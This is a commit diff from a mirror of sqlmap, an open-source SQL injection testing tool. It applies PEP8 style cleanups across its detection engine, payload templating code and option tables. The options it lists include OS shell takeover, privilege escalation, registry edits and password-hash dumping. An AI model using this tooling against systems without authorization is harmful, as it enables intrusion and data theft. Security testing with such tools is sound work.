sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Some more PEPing (I hope that I haven't broke anything)

Browse Source
This commit is contained in:
Miroslav Stampar 2018-03-13 13:45:42 +01:00
parent 8166a4eeb8
commit fa4c1c5251
66 changed files with 1157 additions and 1288 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
lib/controller/checks.py
View File

@ -146,8 +146,7 @@ def checkSqlInjection(place, parameter, value):
# error message, simple heuristic check or via DBMS-specific # error message, simple heuristic check or via DBMS-specific
# payload), ask the user to limit the tests to the fingerprinted # payload), ask the user to limit the tests to the fingerprinted
# DBMS # DBMS
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \ if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
@ -156,9 +155,7 @@ def checkSqlInjection(place, parameter, value):
# message, via simple heuristic check or via DBMS-specific # message, via simple heuristic check or via DBMS-specific
# payload), ask the user to extend the tests to all DBMS-specific, # payload), ask the user to extend the tests to all DBMS-specific,
# regardless of --level and --risk values provided # regardless of --level and --risk values provided
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \ if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
kb.heuristicDbms or injection.dbms):
msg = "for the remaining tests, do you want to include all tests " msg = "for the remaining tests, do you want to include all tests "
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "level (%d)" % conf.level if conf.level < 5 else "" msg += "level (%d)" % conf.level if conf.level < 5 else ""
@ -242,9 +239,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is not included by the # Skip tests if title, vector or DBMS is not included by the
# given test filter # given test filter
if conf.testFilter and not any(conf.testFilter in str(item) or \ if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
re.search(conf.testFilter, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is not included by the given filter" debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -252,9 +247,7 @@ def checkSqlInjection(place, parameter, value):
# Skip tests if title, vector or DBMS is included by the # Skip tests if title, vector or DBMS is included by the
# given skip filter # given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \ if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter" debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -588,10 +581,10 @@ def checkSqlInjection(place, parameter, value):
# body for the test's <grep> regular expression # body for the test's <grep> regular expression
try: try:
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \ output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output: if output:
result = output == "1" result = output == "1"
@ -873,8 +866,7 @@ def checkFalsePositives(injection):
retVal = True retVal = True
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\ if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
pushValue(kb.injection) pushValue(kb.injection)
infoMsg = "checking if the injection point on %s " % injection.place infoMsg = "checking if the injection point on %s " % injection.place
@ -971,7 +963,7 @@ def checkFilteredChars(injection):
# inference techniques depend on character '>' # inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)): if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
warnMsg = "it appears that the character '>' is " warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'" warnMsg += "advised to rerun with the '--tamper=between'"

3
lib/controller/controller.py
View File

@ -406,8 +406,7 @@ def start():
if conf.nullConnection: if conf.nullConnection:
checkNullConnection() checkNullConnection()
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
and (kb.injection.place is None or kb.injection.parameter is None):
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
# NOTE: this is not needed anymore, leaving only to display # NOTE: this is not needed anymore, leaving only to display

26
lib/controller/handler.py
View File

@ -56,19 +56,19 @@ def setHandler():
""" """
items = [ items = [
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
] ]
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _: if _:

22
lib/core/agent.py
View File

@ -294,17 +294,21 @@ class Agent(object):
if payload is None: if payload is None:
return return
_ = ( replacements = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[DELIMITER_START]", kb.chars.start),
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ ("[DELIMITER_STOP]", kb.chars.stop),
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ("[AT_REPLACE]", kb.chars.at),
) ("[SPACE_REPLACE]", kb.chars.space),
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) ("[DOLLAR_REPLACE]", kb.chars.dollar),
("[HASH_REPLACE]", kb.chars.hash_),
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
payload = payload.replace(_, str(randomInt())) payload = payload.replace(_, str(randomInt()))
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
payload = payload.replace(_, randomStr()) payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload: if origValue is not None and "[ORIGVALUE]" in payload:
@ -928,7 +932,7 @@ class Agent(object):
limitedQuery += " %s" % limitStr limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if not " ORDER BY " in limitedQuery: if " ORDER BY " not in limitedQuery:
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT") limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery: elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")] limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]

4
lib/core/bigarray.py
View File

@ -6,9 +6,9 @@ See the file 'LICENSE' for copying permission
""" """
try: try:
import cPickle as pickle import cPickle as pickle
except: except:
import pickle import pickle
import bz2 import bz2
import itertools import itertools

2
lib/core/convert.py
View File

@ -94,7 +94,7 @@ def base64unpickle(value, unsafe=False):
try: try:
retVal = loads(base64decode(value)) retVal = loads(base64decode(value))
except TypeError: except TypeError:
retVal = loads(base64decode(bytes(value))) retVal = loads(base64decode(bytes(value)))
return retVal return retVal

28
lib/core/defaults.py
View File

@ -8,20 +8,20 @@ See the file 'LICENSE' for copying permission
from lib.core.datatype import AttribDict from lib.core.datatype import AttribDict
_defaults = { _defaults = {
"csvDel": ',', "csvDel": ',',
"timeSec": 5, "timeSec": 5,
"googlePage": 1, "googlePage": 1,
"verbose": 1, "verbose": 1,
"delay": 0, "delay": 0,
"timeout": 30, "timeout": 30,
"retries": 3, "retries": 3,
"saFreq": 0, "saFreq": 0,
"threads": 1, "threads": 1,
"level": 1, "level": 1,
"risk": 1, "risk": 1,
"dumpFormat": "CSV", "dumpFormat": "CSV",
"tech": "BEUSTQ", "tech": "BEUSTQ",
"torType": "SOCKS5", "torType": "SOCKS5",
} }
defaults = AttribDict(_defaults) defaults = AttribDict(_defaults)

82
lib/core/dicts.py
View File

@ -208,54 +208,60 @@ FROM_DUMMY_TABLE = {
} }
SQL_STATEMENTS = { SQL_STATEMENTS = {
"SQL SELECT statement": ( "SQL SELECT statement": (
"select ", "select ",
"show ", "show ",
" top ", " top ",
" distinct ", " distinct ",
" from ", " from ",
" from dual", " from dual",
" where ", " where ",
" group by ", " group by ",
" order by ", " order by ",
" having ", " having ",
" limit ", " limit ",
" offset ", " offset ",
" union all ", " union all ",
" rownum as ", " rownum as ",
"(case ", ), "(case ",
),
"SQL data definition": ( "SQL data definition": (
"create ", "create ",
"declare ", "declare ",
"drop ", "drop ",
"truncate ", "truncate ",
"alter ", ), "alter ",
),
"SQL data manipulation": ( "SQL data manipulation": (
"bulk ", "bulk ",
"insert ", "insert ",
"update ", "update ",
"delete ", "delete ",
"merge ", "merge ",
"load ", ), "load ",
),
"SQL data control": ( "SQL data control": (
"grant ", "grant ",
"revoke ", ), "revoke ",
),
"SQL data execution": ( "SQL data execution": (
"exec ", "exec ",
"execute ", "execute ",
"values ", "values ",
"call ", ), "call ",
),
"SQL transaction": ( "SQL transaction": (
"start transaction ", "start transaction ",
"begin work ", "begin work ",
"begin transaction ", "begin transaction ",
"commit ", "commit ",
"rollback ", ), "rollback ",
),
} }
POST_HINT_CONTENT_TYPES = { POST_HINT_CONTENT_TYPES = {

56
lib/core/enums.py
View File

@ -242,40 +242,40 @@ class REDIRECTION:
class PAYLOAD: class PAYLOAD:
SQLINJECTION = { SQLINJECTION = {
1: "boolean-based blind", 1: "boolean-based blind",
2: "error-based", 2: "error-based",
3: "inline query", 3: "inline query",
4: "stacked queries", 4: "stacked queries",
5: "AND/OR time-based blind", 5: "AND/OR time-based blind",
6: "UNION query", 6: "UNION query",
} }
PARAMETER = { PARAMETER = {
1: "Unescaped numeric", 1: "Unescaped numeric",
2: "Single quoted string", 2: "Single quoted string",
3: "LIKE single quoted string", 3: "LIKE single quoted string",
4: "Double quoted string", 4: "Double quoted string",
5: "LIKE double quoted string", 5: "LIKE double quoted string",
} }
RISK = { RISK = {
0: "No risk", 0: "No risk",
1: "Low risk", 1: "Low risk",
2: "Medium risk", 2: "Medium risk",
3: "High risk", 3: "High risk",
} }
CLAUSE = { CLAUSE = {
0: "Always", 0: "Always",
1: "WHERE", 1: "WHERE",
2: "GROUP BY", 2: "GROUP BY",
3: "ORDER BY", 3: "ORDER BY",
4: "LIMIT", 4: "LIMIT",
5: "OFFSET", 5: "OFFSET",
6: "TOP", 6: "TOP",
7: "Table name", 7: "Table name",
8: "Column name", 8: "Column name",
} }
class METHOD: class METHOD:
COMPARISON = "comparison" COMPARISON = "comparison"

6
lib/core/option.py
View File

@ -687,7 +687,7 @@ def _setMetasploit():
if IS_WIN: if IS_WIN:
try: try:
import win32file __import__("win32file")
except ImportError: except ImportError:
errMsg = "sqlmap requires third-party module 'pywin32' " errMsg = "sqlmap requires third-party module 'pywin32' "
errMsg += "in order to use Metasploit functionalities on " errMsg += "in order to use Metasploit functionalities on "
@ -700,7 +700,7 @@ def _setMetasploit():
retVal = None retVal = None
try: try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key) _ = OpenKey(_, key)
retVal = QueryValueEx(_, value)[0] retVal = QueryValueEx(_, value)[0]
@ -2350,7 +2350,7 @@ def _checkWebSocket():
from websocket import ABNF from websocket import ABNF
except ImportError: except ImportError:
errMsg = "sqlmap requires third-party module 'websocket-client' " errMsg = "sqlmap requires third-party module 'websocket-client' "
errMsg += "in order to use WebSocket funcionality" errMsg += "in order to use WebSocket functionality"
raise SqlmapMissingDependence(errMsg) raise SqlmapMissingDependence(errMsg)
def _checkTor(): def _checkTor():

468
lib/core/optiondict.py
View File

@ -6,250 +6,252 @@ See the file 'LICENSE' for copying permission
""" """
optDict = { optDict = {
# Format: # Family: {"parameter name": "parameter datatype"},
# Family: { "parameter name": "parameter datatype" }, # --OR--
# Or: # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
"Target": {
"direct": "string",
"url": "string",
"logFile": "string",
"bulkFile": "string",
"requestFile": "string",
"sessionFile": "string",
"googleDork": "string",
"configFile": "string",
"sitemapUrl": "string",
},
"Request": { "Target": {
"method": "string", "direct": "string",
"data": "string", "url": "string",
"paramDel": "string", "logFile": "string",
"cookie": "string", "bulkFile": "string",
"cookieDel": "string", "requestFile": "string",
"loadCookies": "string", "sessionFile": "string",
"dropSetCookie": "boolean", "googleDork": "string",
"agent": "string", "configFile": "string",
"randomAgent": "boolean", "sitemapUrl": "string",
"host": "string", },
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Optimization": { "Request": {
"optimize": "boolean", "method": "string",
"predictOutput": "boolean", "data": "string",
"keepAlive": "boolean", "paramDel": "string",
"nullConnection": "boolean", "cookie": "string",
"threads": "integer", "cookieDel": "string",
}, "loadCookies": "string",
"dropSetCookie": "boolean",
"agent": "string",
"randomAgent": "boolean",
"host": "string",
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},
"Injection": { "Optimization": {
"testParameter": "string", "optimize": "boolean",
"skip": "string", "predictOutput": "boolean",
"skipStatic": "boolean", "keepAlive": "boolean",
"paramExclude": "string", "nullConnection": "boolean",
"dbms": "string", "threads": "integer",
"dbmsCred": "string", },
"os": "string",
"invalidBignum": "boolean",
"invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Detection": { "Injection": {
"level": "integer", "testParameter": "string",
"risk": "integer", "skip": "string",
"string": "string", "skipStatic": "boolean",
"notString": "string", "paramExclude": "string",
"regexp": "string", "dbms": "string",
"code": "integer", "dbmsCred": "string",
"textOnly": "boolean", "os": "string",
"titles": "boolean", "invalidBignum": "boolean",
}, "invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},
"Techniques": { "Detection": {
"tech": "string", "level": "integer",
"timeSec": "integer", "risk": "integer",
"uCols": "string", "string": "string",
"uChar": "string", "notString": "string",
"uFrom": "string", "regexp": "string",
"dnsDomain": "string", "code": "integer",
"secondOrder": "string", "textOnly": "boolean",
}, "titles": "boolean",
},
"Fingerprint": { "Techniques": {
"extensiveFp": "boolean", "tech": "string",
}, "timeSec": "integer",
"uCols": "string",
"uChar": "string",
"uFrom": "string",
"dnsDomain": "string",
"secondOrder": "string",
},
"Enumeration": { "Fingerprint": {
"getAll": "boolean", "extensiveFp": "boolean",
"getBanner": ("boolean", "Banners"), },
"getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"Brute": { "Enumeration": {
"commonTables": "boolean", "getAll": "boolean",
"commonColumns": "boolean", "getBanner": ("boolean", "Banners"),
}, "getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},
"User-defined function": { "Brute": {
"udfInject": "boolean", "commonTables": "boolean",
"shLib": "string", "commonColumns": "boolean",
}, },
"File system": { "User-defined function": {
"rFile": "string", "udfInject": "boolean",
"wFile": "string", "shLib": "string",
"dFile": "string", },
},
"Takeover": { "File system": {
"osCmd": "string", "rFile": "string",
"osShell": "boolean", "wFile": "string",
"osPwn": "boolean", "dFile": "string",
"osSmb": "boolean", },
"osBof": "boolean",
"privEsc": "boolean",
"msfPath": "string",
"tmpPath": "string",
},
"Windows": { "Takeover": {
"regRead": "boolean", "osCmd": "string",
"regAdd": "boolean", "osShell": "boolean",
"regDel": "boolean", "osPwn": "boolean",
"regKey": "string", "osSmb": "boolean",
"regVal": "string", "osBof": "boolean",
"regData": "string", "privEsc": "boolean",
"regType": "string", "msfPath": "string",
}, "tmpPath": "string",
},
"General": { "Windows": {
#"xmlFile": "string", "regRead": "boolean",
"trafficFile": "string", "regAdd": "boolean",
"batch": "boolean", "regDel": "boolean",
"binaryFields": "string", "regKey": "string",
"charset": "string", "regVal": "string",
"checkInternet": "boolean", "regData": "string",
"crawlDepth": "integer", "regType": "string",
"crawlExclude": "string", },
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},
"Miscellaneous": { "General": {
"alert": "string", # "xmlFile": "string",
"answers": "string", "trafficFile": "string",
"beep": "boolean", "batch": "boolean",
"cleanup": "boolean", "binaryFields": "string",
"dependencies": "boolean", "charset": "string",
"disableColoring": "boolean", "checkInternet": "boolean",
"googlePage": "integer", "crawlDepth": "integer",
"identifyWaf": "boolean", "crawlExclude": "string",
"mobile": "boolean", "csvDel": "string",
"offline": "boolean", "dumpFormat": "string",
"purgeOutput": "boolean", "encoding": "string",
"skipWaf": "boolean", "eta": "boolean",
"smart": "boolean", "flushSession": "boolean",
"tmpDir": "string", "forms": "boolean",
"webRoot": "string", "freshQueries": "boolean",
"wizard": "boolean", "harFile": "string",
"verbose": "integer", "hexConvert": "boolean",
}, "outputDir": "string",
"Hidden": { "parseErrors": "boolean",
"dummy": "boolean", "saveConfig": "string",
"disablePrecon": "boolean", "scope": "string",
"profile": "boolean", "testFilter": "string",
"forceDns": "boolean", "testSkip": "string",
"murphyRate": "integer", "updateAll": "boolean",
"smokeTest": "boolean", },
"liveTest": "boolean",
"stopFail": "boolean", "Miscellaneous": {
"runCase": "string", "alert": "string",
}, "answers": "string",
"API": { "beep": "boolean",
"api": "boolean", "cleanup": "boolean",
"taskid": "string", "dependencies": "boolean",
"database": "string", "disableColoring": "boolean",
} "googlePage": "integer",
} "identifyWaf": "boolean",
"mobile": "boolean",
"offline": "boolean",
"purgeOutput": "boolean",
"skipWaf": "boolean",
"smart": "boolean",
"tmpDir": "string",
"webRoot": "string",
"wizard": "boolean",
"verbose": "integer",
},
"Hidden": {
"dummy": "boolean",
"disablePrecon": "boolean",
"profile": "boolean",
"forceDns": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},
"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}

2
lib/core/profiling.py
View File

@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
""" """
try: try:
__import__("gobject")
from thirdparty.gprof2dot import gprof2dot from thirdparty.gprof2dot import gprof2dot
from thirdparty.xdot import xdot from thirdparty.xdot import xdot
import gobject
import gtk import gtk
import pydot import pydot
except ImportError, e: except ImportError, e:

4
lib/core/settings.py
View File

@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.3.22" VERSION = "1.2.3.23"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -224,7 +224,7 @@ PYVERSION = sys.version.split()[0]
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
